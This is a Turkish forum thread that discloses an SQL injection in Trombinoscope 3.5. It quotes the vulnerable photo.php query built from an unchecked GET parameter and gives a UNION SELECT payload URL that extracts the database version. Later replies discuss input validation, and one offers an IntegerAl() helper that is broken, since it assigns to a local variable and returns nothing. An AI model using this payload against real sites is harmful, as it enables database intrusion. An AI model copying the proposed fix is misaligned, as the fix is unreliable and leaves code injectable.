Trombinoscope 3.5 SQL Injection

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Muhalif Yorumcu
    SeRDaR
    SeRDaR's avatar
    Kayıt Tarihi: 09/Kasım/2003
    Erkek
     Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
    Software Link: http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip


    Açığa sebebep olan photo.php deki kodlar

     <?php
     $id = $_GET["id"];
    
     $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";
     $seul = mysql_query($query_seul) or die(mysql_error());
     $row_seul = mysql_fetch_assoc($seul);
    
    ?>
     
    Örnek Exploit: http://site.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--

    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek

    Programcıların, özellikle Web programcılarının,

    Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...

    Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...

    İlla bi yerde unutursun ondan sonra böyle...


    10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EmQceR
    EmQceR's avatar
    Kayıt Tarihi: 14/Kasım/2007
    Erkek

     

    renegadealien bunu yazdı:
    -----------------------------

    Programcıların, özellikle Web programcılarının,

    Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...

    Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...

    İlla bi yerde unutursun ondan sonra böyle...


    -----------------------------

    hocam vaktin varsa bununla ilgili makale,döküman vs. yazabilir misin?


    ...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Realist
    Realist's avatar
    Kayıt Tarihi: 13/Nisan/2007
    Erkek

    EmQceR bunu yazdı:
    -----------------------------

     

    renegadealien bunu yazdı:
    -----------------------------

    Programcıların, özellikle Web programcılarının,

    Get'le, requestle data almayı bırakması, Değişken çeşidine göre kontrol yapıp değer alan fonksiyonlar ile işlem yapması şart...

    Yaz bi fonksiyon IntegerAl() diye bitsin gitsin arkadaş...

    İlla bi yerde unutursun ondan sonra böyle...


    -----------------------------

    hocam vaktin varsa bununla ilgili makale,döküman vs. yazabilir misin?


    -----------------------------

    <?php
    function IntegerAl($degisken,$get)
    {
    $degisken=(int)mysql_real_escape_string($_GET[$get]);
    }
    IntegerAl('no','id');
    ?>

     

    ..
Toplam Hit: 1099 Toplam Mesaj: 4